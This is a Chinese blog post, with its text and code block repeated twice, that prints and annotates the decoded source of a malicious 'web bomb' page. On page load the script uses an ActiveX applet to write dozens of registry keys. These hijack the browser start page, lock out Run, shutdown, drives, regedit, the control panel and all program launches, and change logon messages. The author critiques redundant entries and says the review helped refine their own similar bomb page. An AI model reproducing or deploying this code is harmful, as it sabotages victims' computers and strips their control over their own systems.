几个月前,发现一个好东西,据说是“混客绝情炸弹”的原代码,down了之后一看,加密的代码!哎,手头还有其他事情,没顾上看。前几天没事,又翻出来那段代码,看了一下,现在就讲一下修改注册表项目的代码含义,至于其他JS代码不做介绍。
原代码如下:
-----------------------------------------------------
<script language=javascript>
<!--
var Words ="<meta http-equiv="Content-Language" content="zh-cn">
<script>
//写注册表的代码
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
document.write("<h1>世上本无情,庸人自扰之。。。。。</h1>");
function f()
{
try
{
//为写注册表做准备
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
//正式开始修改注册表
try
{
//修改IE首页
Shl.RegWrite ("HKCU//Software//Microsoft//Internet Explorer//Main//Start Page", " http://ok989.ok999.net");
//禁止“开始”-“运行”
Shl.RegWrite
("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer
//NoRun", 01, "REG_BINARY");
//禁止“开始”-“关闭系统”
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer
//NoClose", 01, "REG_BINARY");
//禁止“开始”-“注销”
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer
//NoLogOff", 01, "REG_BINARY");
//屏蔽驱动器(效果上已达到屏蔽所有的驱动器)
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer
//NoDrives", "67108863", "REG_DWORD");
//禁止使用Regedit.exe修改注册表
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//System//
DisableRegistryTools", "00000001", "REG_DWORD");
//禁止显示桌面图标
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoDesktop","00000001","REG_DWORD");
//禁止“MD-DOS兼容程序”
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//
Policies//WinOldApp//Disabled", "00000001", "REG_DWORD");
//禁止“开始”-“关闭系统”的“重新启动计算机并切换到MS-DOS方式”选单
Shl.RegWrite
("HKCU//Software//Microsoft//Windows//CurrentVersion//
Policies//WinOldApp//NoRealMode", "00000001", "REG_DWORD");
//修改系统启动时弹出的对话框
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//
Winlogon//LegalNoticeCaption", "★魔界鬼域★");
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//
Winlogon//LegalNoticeText", "★天地无情。死不瞑目★");
//添加启动项,无用
Shl.RegWrite ("HKEY_LOCAL_MACHINE//Software//Microsoft//Windows//CurrentVersion//
RunServices//SchedulingAgent","","REG_SZ");
//禁止保存用户设置
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoSaveSettings",01,"REG_BINARY");
//禁止桌面,驱动器,文件夹右键
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoViewContextMenu",01,"REG_BINARY");
//禁止任务栏右键
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoTrayContextMenu",01,"REG_BINARY");
//添加启动项,无用
Shl.RegWrite ("HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//
Run//ScanRegistry","","REG_SZ");
//禁止打开文件夹
Shl.RegWrite ("HKEY_CLASSES_ROOT//Folder//shell//open//ddeexec//"
,"rem [ViewFolder(%l, %I, %S)]","REG_SZ");
Shl.RegWrite ("HKEY_CLASSES_ROOT//Folder//shell//explore//ddeexec//"
,"rem [ViewFolder(%l, %I, %S)]","REG_SZ");
//作用不详
Shl.RegWrite ("HKEY_CLASSES_ROOT//CLSID//{01E04581-4EEE-11d0-BFE9-00AA005B4383},"rem [ViewFolder(%l, %I, %S)]","REG_SZ");
//作用不详
Shl.RegWrite ("HKEY_CLASSES_ROOT//CLSID//{01E04581-4EEE-11d0-BFE9-00AA005B4383},"REG_SZ");
//禁止.reg文件,文本方式打开
Shl.RegWrite ("HKEY_LOCAL_MACHINE//Software//CLASSES//.reg//","txtfile","REG_SZ");
//禁止运行任何程序
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//RestrictRun","00000001", "REG_DWORD");
//作用不详
Shl.RegWrite ("HKEY_LOCAL_MACHINE//Enum//PCI//ChannelOptions",02,"REG_BINARY");
//禁止关闭IE窗口
Shl.RegWrite ("HKCU//Software//Policies//Microsoft//Internet Explorer//Restrictions//NoBrowserClose","01", "REG_DWORD"); //禁止“我的电脑”-“属性”-“设备管理器”
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//System//NoDevMgrPage",1, "REG_DWORD");
//禁止“控制面板”
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//
Explorer//NoSetFolders",1,"REG_DWORD");
//禁止“开始”-“查找”
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoFind", "00000001", "REG_DWORD");
//禁止“开始”-“收藏夹”
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoFavoritesMenu", "00000001", "REG_DWORD");
//禁止“开始”-“文档”
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoRecentDocsMenu", "00000001", "REG_DWORD");
//禁止“任务栏属性”
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoSetTaskbar", "00000001", "REG_DWORD");
//修改时间提示信息
Shl.RegWrite ("HKEY_CURRENT_USER//Control Panel//International//stimeformat","HH:mm:ss tt","REG_SZ");
Shl.RegWrite ("HKEY_CURRENT_USER//ControlPanel//International//s1159"
,"★绝情魔界★","REG_SZ"); Shl.RegWrite ("HKEY_CURRENT_USER//Control Panel//International//s2359","★绝情魔界★","REG_SZ");
//end Write Regedit
document.write("<body bgcolor=#FF0000>");
document.write("<h1>天地无情。死不瞑目</h1>");
}
catch(e)
{
document.write("<body bgcolor=#FF0000>");
document.write("<h1>天地无情。死不瞑目!</h1>");
}
}
catch(e)
{
document.write("<body bgcolor=#FF0000>");
document.write("<h1>天地无情。死不瞑目</h1>");
}
}
function clean()
{
setTimeout("f()", 1000);
}
clean();
</script>
<SCRIPT LANGUAGE="javascript">
<!-- Begin
if (this.name!=fullscreen)
{
window.open(location.href,fullscreen,fullscreen,scrollbars)
}
// End -->
</script>
<body bgcolor="#FF0000">
<p><b><font size="7" face="华文彩云">
</font></b></p>
<p><b><font face="华文彩云" size="7">
抽刀断水,水更流。</font></b></p>
<p><font face="华文彩云"><font size="7"><b>
举杯消愁,愁更愁</b></font><b><font size="7">。</font></b></font></p>"
//解密原代码
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</script>
-----------------------------------------------------
下面再来说一下我对这段代码的看法,从头说起吧:
1.代码中有2次添加了无用的启动项,没有任何意义。
2.由于代码中禁止了所有程序运行(十分歹毒),reg文件和inf文件是无法打开的,因此无须更改reg和inf文件的类型,这2项成为多余的代码(这是我以前测试"极恶万花谷"时发现的小Bug吧)。另外,禁止MS-DOS兼容程序也成为多余的代码。
3.禁止保存用户设置,感觉没什么用处,可以去掉。
4.禁用设备管理器,禁止收藏夹,禁止文档似乎是无用之举,看不出有什么意义。
5.禁止关闭计算机,再禁止"重新启动计算机并切换到MS-DOS方式"也就显得多余了。
6.其中有2项我不明白其中的含义,不过感觉也是没有实际意义的多余代码。
7.值得一提的是,第一个添加启动项的代码中使用了注册表主键的全称,即"HKEY_LOCAL_MACHINE"。这是我第一次看到这样修改注册表(对我修正我的"极恶万花谷"有很大帮助),以前看到的都是缩写,即HKEY_LOCAL_MACHINE=HKLC,HKEY_CURRENT_USER=HKCU。
原代码如下:
-----------------------------------------------------
<script language=javascript>
<!--
var Words ="<meta http-equiv="Content-Language" content="zh-cn">
<script>
//写注册表的代码
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
document.write("<h1>世上本无情,庸人自扰之。。。。。</h1>");
function f()
{
try
{
//为写注册表做准备
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
//正式开始修改注册表
try
{
//修改IE首页
Shl.RegWrite ("HKCU//Software//Microsoft//Internet Explorer//Main//Start Page", " http://ok989.ok999.net");
//禁止“开始”-“运行”
Shl.RegWrite
("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer
//NoRun", 01, "REG_BINARY");
//禁止“开始”-“关闭系统”
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer
//NoClose", 01, "REG_BINARY");
//禁止“开始”-“注销”
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer
//NoLogOff", 01, "REG_BINARY");
//屏蔽驱动器(效果上已达到屏蔽所有的驱动器)
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//Explorer
//NoDrives", "67108863", "REG_DWORD");
//禁止使用Regedit.exe修改注册表
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//System//
DisableRegistryTools", "00000001", "REG_DWORD");
//禁止显示桌面图标
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoDesktop","00000001","REG_DWORD");
//禁止“MD-DOS兼容程序”
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//
Policies//WinOldApp//Disabled", "00000001", "REG_DWORD");
//禁止“开始”-“关闭系统”的“重新启动计算机并切换到MS-DOS方式”选单
Shl.RegWrite
("HKCU//Software//Microsoft//Windows//CurrentVersion//
Policies//WinOldApp//NoRealMode", "00000001", "REG_DWORD");
//修改系统启动时弹出的对话框
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//
Winlogon//LegalNoticeCaption", "★魔界鬼域★");
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//
Winlogon//LegalNoticeText", "★天地无情。死不瞑目★");
//添加启动项,无用
Shl.RegWrite ("HKEY_LOCAL_MACHINE//Software//Microsoft//Windows//CurrentVersion//
RunServices//SchedulingAgent","","REG_SZ");
//禁止保存用户设置
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoSaveSettings",01,"REG_BINARY");
//禁止桌面,驱动器,文件夹右键
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoViewContextMenu",01,"REG_BINARY");
//禁止任务栏右键
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoTrayContextMenu",01,"REG_BINARY");
//添加启动项,无用
Shl.RegWrite ("HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//
Run//ScanRegistry","","REG_SZ");
//禁止打开文件夹
Shl.RegWrite ("HKEY_CLASSES_ROOT//Folder//shell//open//ddeexec//"
,"rem [ViewFolder(%l, %I, %S)]","REG_SZ");
Shl.RegWrite ("HKEY_CLASSES_ROOT//Folder//shell//explore//ddeexec//"
,"rem [ViewFolder(%l, %I, %S)]","REG_SZ");
//作用不详
Shl.RegWrite ("HKEY_CLASSES_ROOT//CLSID//{01E04581-4EEE-11d0-BFE9-00AA005B4383},"rem [ViewFolder(%l, %I, %S)]","REG_SZ");
//作用不详
Shl.RegWrite ("HKEY_CLASSES_ROOT//CLSID//{01E04581-4EEE-11d0-BFE9-00AA005B4383},"REG_SZ");
//禁止.reg文件,文本方式打开
Shl.RegWrite ("HKEY_LOCAL_MACHINE//Software//CLASSES//.reg//","txtfile","REG_SZ");
//禁止运行任何程序
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//RestrictRun","00000001", "REG_DWORD");
//作用不详
Shl.RegWrite ("HKEY_LOCAL_MACHINE//Enum//PCI//ChannelOptions",02,"REG_BINARY");
//禁止关闭IE窗口
Shl.RegWrite ("HKCU//Software//Policies//Microsoft//Internet Explorer//Restrictions//NoBrowserClose","01", "REG_DWORD"); //禁止“我的电脑”-“属性”-“设备管理器”
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//System//NoDevMgrPage",1, "REG_DWORD");
//禁止“控制面板”
Shl.RegWrite ("HKCU//Software//Microsoft//Windows//CurrentVersion//Policies//
Explorer//NoSetFolders",1,"REG_DWORD");
//禁止“开始”-“查找”
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoFind", "00000001", "REG_DWORD");
//禁止“开始”-“收藏夹”
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoFavoritesMenu", "00000001", "REG_DWORD");
//禁止“开始”-“文档”
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoRecentDocsMenu", "00000001", "REG_DWORD");
//禁止“任务栏属性”
Shl.RegWrite ("HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//
Policies//Explorer//NoSetTaskbar", "00000001", "REG_DWORD");
//修改时间提示信息
Shl.RegWrite ("HKEY_CURRENT_USER//Control Panel//International//stimeformat","HH:mm:ss tt","REG_SZ");
Shl.RegWrite ("HKEY_CURRENT_USER//ControlPanel//International//s1159"
,"★绝情魔界★","REG_SZ"); Shl.RegWrite ("HKEY_CURRENT_USER//Control Panel//International//s2359","★绝情魔界★","REG_SZ");
//end Write Regedit
document.write("<body bgcolor=#FF0000>");
document.write("<h1>天地无情。死不瞑目</h1>");
}
catch(e)
{
document.write("<body bgcolor=#FF0000>");
document.write("<h1>天地无情。死不瞑目!</h1>");
}
}
catch(e)
{
document.write("<body bgcolor=#FF0000>");
document.write("<h1>天地无情。死不瞑目</h1>");
}
}
function clean()
{
setTimeout("f()", 1000);
}
clean();
</script>
<SCRIPT LANGUAGE="javascript">
<!-- Begin
if (this.name!=fullscreen)
{
window.open(location.href,fullscreen,fullscreen,scrollbars)
}
// End -->
</script>
<body bgcolor="#FF0000">
<p><b><font size="7" face="华文彩云">
</font></b></p>
<p><b><font face="华文彩云" size="7">
抽刀断水,水更流。</font></b></p>
<p><font face="华文彩云"><font size="7"><b>
举杯消愁,愁更愁</b></font><b><font size="7">。</font></b></font></p>"
//解密原代码
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</script>
-----------------------------------------------------
下面再来说一下我对这段代码的看法,从头说起吧:
1.代码中有2次添加了无用的启动项,没有任何意义。
2.由于代码中禁止了所有程序运行(十分歹毒),reg文件和inf文件是无法打开的,因此无须更改reg和inf文件的类型,这2项成为多余的代码(这是我以前测试"极恶万花谷"时发现的小Bug吧)。另外,禁止MS-DOS兼容程序也成为多余的代码。
3.禁止保存用户设置,感觉没什么用处,可以去掉。
4.禁用设备管理器,禁止收藏夹,禁止文档似乎是无用之举,看不出有什么意义。
5.禁止关闭计算机,再禁止"重新启动计算机并切换到MS-DOS方式"也就显得多余了。
6.其中有2项我不明白其中的含义,不过感觉也是没有实际意义的多余代码。
7.值得一提的是,第一个添加启动项的代码中使用了注册表主键的全称,即"HKEY_LOCAL_MACHINE"。这是我第一次看到这样修改注册表(对我修正我的"极恶万花谷"有很大帮助),以前看到的都是缩写,即HKEY_LOCAL_MACHINE=HKLC,HKEY_CURRENT_USER=HKCU。
2540
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
